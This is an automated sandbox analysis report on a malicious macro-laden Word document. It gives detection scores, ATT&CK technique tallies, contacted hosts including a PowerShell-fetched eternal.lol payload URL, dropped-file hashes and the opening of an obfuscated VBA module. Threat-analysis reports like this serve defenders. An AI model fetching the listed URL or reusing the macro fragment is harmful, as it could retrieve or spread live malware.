Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 13 Exploitation for Client Execution; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 2 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 2 Encrypted Channel; 1 Non-Application Layer Protocol; 2 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
DUD6CqQ1Uj.doc | 62% | Virustotal |
DUD6CqQ1Uj.doc | 61% | ReversingLabs | Document-Word.Trojan.Valyria
DUD6CqQ1Uj.doc | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\Desktop\~WRD0000.tmp | 100% | Joe Sandbox ML |
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label
https://eternal.lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26 | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.pngxBX% | 0% | Avira URL Cloud | safe
https://eternal.lol | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
eternal.lol | 192.64.119.42 | true | false | | unknown
sni1gl.wpc.sigmacdn.net | 152.199.21.175 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12722139474.000002ADE0918000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/w | powershell.exe, 00000004.00000002.12696586915.000002ADC99B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://eternal.lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26 | powershell.exe, 00000004.00000002.12696586915.000002ADC8531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/powershell51-help | powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.pngxBX% | powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/PesterxBX% | powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-ps | powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/powershell51-helpxBX% | powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/powershell51-help(WZ% | powershell.exe, 00000004.00000002.12696586915.000002ADCA5FC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.12716256674.000002ADD85C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp(WZ% | powershell.exe, 00000004.00000002.12696586915.000002ADCA330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC99B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADCA30A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC9B52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.htmlxBX% | powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://eternal.lol | powershell.exe, 00000004.00000002.12696586915.000002ADC8756000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.12696586915.000002ADC8531000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelpxBX% | powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pss | powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/PSWindows3 | powershell.exe, 00000004.00000002.12696586915.000002ADC8531000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
192.64.119.42 | eternal.lol | United States | 22612 | NAMECHEAP-NETUS | false
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1584650
                                                        Start date and time:2025-01-06 06:06:08 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 4m 43s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                        Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                                                        Run name:Potential for more IOCs and behavior
                                                        Number of analysed new started processes analysed:29
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • GSI enabled (VBA)
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:DUD6CqQ1Uj.doc
                                                        renamed because original name is a hash value
                                                        Original Sample Name:9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb.doc
                                                        Detection:MAL
                                                        Classification:mal96.expl.evad.winDOC@5/16@1/1
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 4
                                                        • Number of non-executed functions: 2
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .doc
                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                        • Attach to Office via COM
                                                        • Scroll down
                                                        • Close Viewer
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.68.130, 52.113.194.132, 52.109.6.63, 52.168.117.168, 52.111.236.33, 52.111.236.32, 52.111.236.35, 52.111.236.34, 95.100.110.78, 95.100.110.68, 40.126.32.74, 152.199.21.175, 20.109.210.53, 20.223.35.26
                                                        • Excluded domains from analysis (whitelisted): odc.officeapps.live.com, res-2.cdn.office.net, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, templatesmetadata.office.net.edgekey.net, eus2-azsc-000.roaming.officeapps.live.com, osiprod-eus2-buff-azsc-000.eastus2.cloudapp.azure.com, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, cdn-office.azureedge.net, login.live.com, officeclient.microsoft.com, templatesmetadata.office.net, c.pki.goog, ecs.office.com, client.wns.windows.com, prod.configsvc1.live.com.akadns.net, fd.api.iris.microsoft.com, frc-azsc-000.odc.officeapps.live.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, cdn-office.ec.azureedge.net, us1.roaming1.live.com.akadns.net, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, x1.c.lencr.org, nleditor.osi.office.net, e26769.dscb.akamaiedge.net, res-prod.trafficmanager.net, prod-eu-resolver.naturallanguageeditorservice.osi.office.net.aka
                                                        • Execution Graph export aborted for target powershell.exe, PID 7996 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                        • Report size getting too big, too many NtSetValueKey calls found.
Time | Type | Description
00:07:15 | API Interceptor | 1264x Sleep call for process: powershell.exe modified
                                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
sni1gl.wpc.sigmacdn.net | WRD1792.docx.doc | malicious | Dynamer | 152.199.21.175
sni1gl.wpc.sigmacdn.net | tftpd64.exe | malicious | Unknown | 152.199.21.175
sni1gl.wpc.sigmacdn.net | SWIFT.xls | malicious | Unknown | 152.199.21.175
sni1gl.wpc.sigmacdn.net | invoice.docm | malicious | Metasploit | 152.199.21.175
sni1gl.wpc.sigmacdn.net | Ball - Temp.data for GCMs.doc | malicious | HTMLPhisher | 152.199.21.175
sni1gl.wpc.sigmacdn.net | Order_948575494759.xls | malicious | Unknown | 152.199.21.175
sni1gl.wpc.sigmacdn.net | index.html.docx | malicious | Unknown | 152.199.21.175
sni1gl.wpc.sigmacdn.net | https://syndiclair-my.sharepoint.com/:o:/g/personal/ml_syndiclair_fr/En8EbZMYpZ5CodZQ05mt4IMBGZHEHcSylnIeMh0DoULmZw?e=UkXb4Y | malicious | Unknown | 152.199.21.175
sni1gl.wpc.sigmacdn.net | https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9 | malicious | Unknown | 152.199.21.175
sni1gl.wpc.sigmacdn.net | 174 Power Global_Enrollment_.docx.doc | malicious | Unknown | 152.199.21.175
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NAMECHEAP-NETUS | Payment Receipt.exe | malicious | FormBook | 199.192.21.169
NAMECHEAP-NETUS | http://keywestlending.com | malicious | CAPTCHA Scam ClickFix | 104.219.248.99
NAMECHEAP-NETUS | inv#12180.exe | malicious | FormBook | 199.192.21.169
NAMECHEAP-NETUS | loligang.mips.elf | malicious | Mirai | 37.61.233.171
NAMECHEAP-NETUS | https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.com | malicious | HTMLPhisher | 198.54.116.86
NAMECHEAP-NETUS | SW_48912.scr.exe | malicious | FormBook | 162.0.236.169
NAMECHEAP-NETUS | Laurier Partners Proposal.eml | malicious | HTMLPhisher | 199.188.207.168
NAMECHEAP-NETUS | https://supercrete.lk/m/ms_doc.html | malicious | HTMLPhisher | 199.188.200.142
NAMECHEAP-NETUS | http://jonotarmot.com/dcs/ms_doc.html | malicious | HTMLPhisher | 198.54.120.20
                                                        No context
                                                        No context
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):9434
                                                        Entropy (8bit):4.93135987101331
                                                        Encrypted:false
                                                        SSDEEP:192:Mxoe5ZpOUxoe5Eib4+Vsm5emd1gkjDt4iWN3yBGHV9smkdcU6CKdcU6Cs9smnpOu:uAib4+ykjh4iUxUtY7ib4e
                                                        MD5:D84C4876DBEC0BB4311069E5B8D21EF3
                                                        SHA1:F1364C57CDBDF3AF34CC3F01E23BE33D85C6C959
                                                        SHA-256:B2BE73589C2723771C9C8C5F03DC51165C64C8C0C1A7AD568B2A4ADB988E74D9
                                                        SHA-512:812EE5BAC16837C28C29C2200CF15B19EBF1741EB2DF0940E52BB5603C32377D5B7A585E1D00EE6B08186043E2AB5586A466275426F3F8374DB6DF0ED2181A27
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1204
                                                        Entropy (8bit):5.327349596130257
                                                        Encrypted:false
                                                        SSDEEP:24:3UDjgcP9wjGo4KCcMRPtLgP7KcgoSM9tdL4tTiK+7PrK90lh9R:SccP9Sn4LRBgjnSM9tdL4tTiJPuchD
                                                        MD5:5108554D86A895205A94FA0ECC81C3DC
                                                        SHA1:EC109FAC3C996FFCCED1E0BC8A37A19261F2B2BF
                                                        SHA-256:BE8B9734830766827C04E60E6022E2B77DF055302E78D6B60F3C3266C755B68F
                                                        SHA-512:7F77E22E20CAFDBC30D41317F82F1643628FBDE25C9810034179A381DA223251DA4AB401866D130CAC4C62DEB0C02BADD706422EAAE7EEE8C5D488C8E063459F
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1758
                                                        Entropy (8bit):2.6946609091905285
                                                        Encrypted:false
                                                        SSDEEP:48:m8/WKGKLsOdpep4TB4MmmEtK0Ial11pnv5kyTzi:lQOdracqJB5C
                                                        MD5:4AF9AFE668DAAF062A82275BF38584A0
                                                        SHA1:A95D4262B276B95047CA08FE5A0DCFD4387C6DA6
                                                        SHA-256:5307DC1679D6001633CD5AB5AF6D8039CD56CB18451ED743C51D8D7445774644
                                                        SHA-512:0E2E578430DBC95AA4422D674C017B812EFE5A2DDA27D19087D69549D9B4BD8AE8EC4B1655234C99A02A166B3D30B18EA951D4090E1B0F35C643828DC214C49A
                                                        Malicious:false
                                                        Reputation:low
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):512
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                        Malicious:false
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6221
                                                        Entropy (8bit):3.7488911705248857
                                                        Encrypted:false
                                                        SSDEEP:48:JjEsU9CK2Uuehj4wwukvhkvklCywhekcForo31XSogZoihEcForo35XSogZoi1+:l/8CQZh3kvhkvCCtWFMtHpFMJHA
                                                        MD5:4C07C301E495044A1FC4408FD23C2F33
                                                        SHA1:9B3E7627ADEC9995C71C3ED591B3CC7E5B8FDD81
                                                        SHA-256:E92BB367476A85AE6A2442CA3FAE3E0C7E684CAECCA52B44674B52CCD7BD653A
                                                        SHA-512:681CBEAEB8F3DB03FFA67787B2A251E712CD005E98078F8D700765873F664158B3BC712B11C7ADF667A65E330A33E9C8FB4AB44FC7009393D3E8A7655F57EA43
                                                        Malicious:false
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6221
                                                        Entropy (8bit):3.7488911705248857
                                                        Encrypted:false
                                                        SSDEEP:48:JjEsU9CK2Uuehj4wwukvhkvklCywhekcForo31XSogZoihEcForo35XSogZoi1+:l/8CQZh3kvhkvCCtWFMtHpFMJHA
                                                        MD5:4C07C301E495044A1FC4408FD23C2F33
                                                        SHA1:9B3E7627ADEC9995C71C3ED591B3CC7E5B8FDD81
                                                        SHA-256:E92BB367476A85AE6A2442CA3FAE3E0C7E684CAECCA52B44674B52CCD7BD653A
                                                        SHA-512:681CBEAEB8F3DB03FFA67787B2A251E712CD005E98078F8D700765873F664158B3BC712B11C7ADF667A65E330A33E9C8FB4AB44FC7009393D3E8A7655F57EA43
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ...]...eJ... ..LJ.....t.a............................:..IG..Yr?.D..U..k0.&...&......p...eJ......._......._......t...CFSF..1......Y....AppData...t.Y^...H.g.3..(.....gVA.G..k...@......Y..&Z.(..............................A.p.p.D.a.t.a...B.V.1.....&Z.(..Roaming.@......Y..&Z.(..........................:.y.R.o.a.m.i.n.g.....\.1.....&Z.(..MICROS~1..D......Y..&Z.(..........................T...M.i.c.r.o.s.o.f.t.....V.1......Y-...Windows.@......Y..&Z.(...........................g..W.i.n.d.o.w.s.......1......Y....STARTM~1..n......Y...Y.....................D.....ZEr.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......Y...Y.....................@......b..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......TA-..WINDOW~1..V......Y...YYy..........................|iF.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......T.* .WINDOW~1.LNK..^......Y...Y.y................
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Tiago Oliveira, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 28 01:44:00 2023, Last Saved Time/Date: Mon Jan 6 05:07:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
                                                        Category:dropped
                                                        Size (bytes):31744
                                                        Entropy (8bit):4.178602493534855
                                                        Encrypted:false
                                                        SSDEEP:384:wwm3s8iSwvxjk+tDZPst7fDkl8OOFV/gVAd:fMSxw+ttCfDg8BFgs
                                                        MD5:DA9D559A420E8654C06996910594F2F4
                                                        SHA1:C1B973C1DBD76B0F69EC807DE1B4FA65D4C41EF5
                                                        SHA-256:0BC7DD217CBE4FBE7FEFE5B9C2E8BC7FA4046B51A3EF467FEB3E3ED4AC78A879
                                                        SHA-512:ED0B31379119C7361C4ED98F86D394A9F80B3FD17F4D09AB9204E01023B043961656079C46C9D092EB0A9AC2EB3230137FBF71973B2F222376E9113202ED2F91
                                                        Malicious:true
                                                        Preview:......................>.......................'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................k.. ..........................bjbj..............................,j.,j..................................................................................F.......F...........................................................................................................9...t...................................................................7...............................................................c...P.........................................................................
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.280616152050036
                                                        Encrypted:false
                                                        SSDEEP:3:blRmMf64Z+/lTVlltPlcX8DdhxKn:bzmMi4Q5llMswn
                                                        MD5:F14EAB2CF7F8451E929708C5FCD0BF33
                                                        SHA1:3B37B538528BCCDF8EAC3443790A9763886D63A0
                                                        SHA-256:8FB42E3A4BD311F26708A08C49F4B670ADD7B4A617490F9BD1EA85830144D61B
                                                        SHA-512:BF727E680A3A3F3AFD4FC3B9011A6E67FF0DF6AC5A1E198E5CB62901F3137397DB0C401CC0D861632A22EAA0581A6D336E802DE220AED0D42AC2CFA8ECB73849
                                                        Malicious:false
                                                        Preview:.user..................................................M.a.o.g.a.......i8....p7O.............8n.2.....................................ja.....................6.M2
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Tiago Oliveira, Template: Normal, Last Saved By: user, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 28 01:44:00 2023, Last Saved Time/Date: Mon Jan 6 05:07:00 2025, Number of Pages: 1, Number of Words: 0, Number of Characters: 4, Security: 0
                                                        Category:dropped
                                                        Size (bytes):31744
                                                        Entropy (8bit):4.178602493534855
                                                        Encrypted:false
                                                        SSDEEP:384:wwm3s8iSwvxjk+tDZPst7fDkl8OOFV/gVAd:fMSxw+ttCfDg8BFgs
                                                        MD5:DA9D559A420E8654C06996910594F2F4
                                                        SHA1:C1B973C1DBD76B0F69EC807DE1B4FA65D4C41EF5
                                                        SHA-256:0BC7DD217CBE4FBE7FEFE5B9C2E8BC7FA4046B51A3EF467FEB3E3ED4AC78A879
                                                        SHA-512:ED0B31379119C7361C4ED98F86D394A9F80B3FD17F4D09AB9204E01023B043961656079C46C9D092EB0A9AC2EB3230137FBF71973B2F222376E9113202ED2F91
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:......................>.......................'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................k.. ..........................bjbj..............................,j.,j..................................................................................F.......F...........................................................................................................9...t...................................................................7...............................................................c...P.........................................................................
                                                        Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1200, Author: Tiago Ol, Number of Characters: 0, Create Time/Date: Tue Feb 28 04:44:00 2023, Last Saved By: Tiago Ol, Last Saved Time/Date: Tue Feb 28 05:12:00 2023, Name of Creating Application: Microsoft O, Number of Pages: 1, Revision Number: 4, Security: 0, Template: Normal, Number of Words: 0
                                                        Entropy (8bit):4.428735214508121
                                                        TrID:
                                                        • Microsoft Word document (32009/1) 54.23%
                                                        • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                        File name:DUD6CqQ1Uj.doc
                                                        File size:19'968 bytes
                                                        MD5:4fd8d5da5cd2109c730052735c9ccbb6
                                                        SHA1:2d175610936cdfc27380c13d89f5883db532d2b2
                                                        SHA256:9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb
                                                        SHA512:b4c148540e3af0ebc2ce8107daed1bc19585910f7509ee70f53bbe2c500cce057e45effe9e957f2dfb1392a86dc8ccbb09207b919bbb200f5285cedb5ee399a5
                                                        SSDEEP:192:PrRYrYol7GbIklKjOOkx8V/gVYxTZ+NxImB3w4ppBVltjOuuuudw83Z+f:+fDkl8OOFV/gVAdItODpe
                                                        TLSH:E092E610FB99D91AF4A665744923C184BB78BC9C5911834B734CFF6DFC306B44AA1B1A
                                                        File Content Preview:........................!.......................!...........................%..................................................................................................................................................................................
                                                        Icon Hash:35e1cc889a8a8599
                                                        Document Type:OLE
                                                        Number of OLE Files:1
                                                        Has Summary Info:
                                                        Application Name:Microsoft Office Word
                                                        Encrypted Document:False
                                                        Contains Word Document Stream:True
                                                        Contains Workbook/Book Stream:False
                                                        Contains PowerPoint Document Stream:False
                                                        Contains Visio Document Stream:False
                                                        Contains ObjectPool Stream:False
                                                        Flash Objects Count:0
                                                        Contains VBA Macros:True
                                                        Code Page:1200
                                                        Title:
                                                        Subject:
                                                        Author:Tiago Oliveira
                                                        Keywords:
                                                        Comments:
                                                        Template:Normal.dotm
                                                        Last Saved By:Tiago Oliveira
                                                         Revision Number:4
                                                        Total Edit Time:0
                                                        Last Printed:1601-01-01 00:00:00
                                                        Create Time:2023-03-31 04:44:00
                                                        Last Saved Time:2023-03-31 05:12:00
                                                        Number of Pages:1
                                                        Number of Words:0
                                                        Number of Characters:0
                                                        Creating Application:Microsoft Office Word
                                                        Security:0
                                                        Document Code Page:1200
                                                        Number of Lines:0
                                                        Number of Paragraphs:0
                                                        Thumbnail Scaling Desired:False
                                                        Company:
                                                        Contains Dirty Links:False
                                                        Application Version:1048576
                                                        General
                                                        Stream Path:Macros/VBA/NewModule
                                                        VBA File Name:NewModule.bas
                                                        Stream Size:6886
                                                        Data ASCII:. . . P u b l i c S . u b a w n d j . f a w d w d ( ) . . ' Z f L O x . U A C Z i U y v . f G G C f i h L . h r h w w n J p . p M i L M i Q E . E n Z Z L n n J . E Z k J O L k r . C i r p E i L i . x D A O M f B U . G D Z h f v M k . T M n i i Q Q k . i r v k r J M x y s M U G J k . . g v f ` i G O s s . U A s G x y p B . p v v k h D Z L . B B C C y i C y . w G C E f O w A @ f k C x M r " J . v n E y G J Q A . J k f h y M G y . f y p U A w x D . T n J n L x B r . k G A B r C Q T . E r k A v B s C . U
                                                        Data Raw:01 d8 bc 00 50 75 62 6c 69 63 20 53 00 75 62 20 61 77 6e 64 6a 00 66 61 77 64 77 64 28 29 00 0a 20 27 5a 66 4c 4f 78 00 55 41 43 5a 69 55 79 76 00 66 47 47 43 66 69 68 4c 00 68 72 68 77 77 6e 4a 70 00 70 4d 69 4c 4d 69 51 45 00 45 6e 5a 5a 4c 6e 6e 4a 00 45 5a 6b 4a 4f 4c 6b 72 00 43 69 72 70 45 69 4c 69 00 78 44 41 4f 4d 66 42 55 00 47 44 5a 68 66 76 4d 6b 00 54 4d 6e 69 69 51 51
                                                        Public Sub awndjfawdwd()
                                                         'ZfLOxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
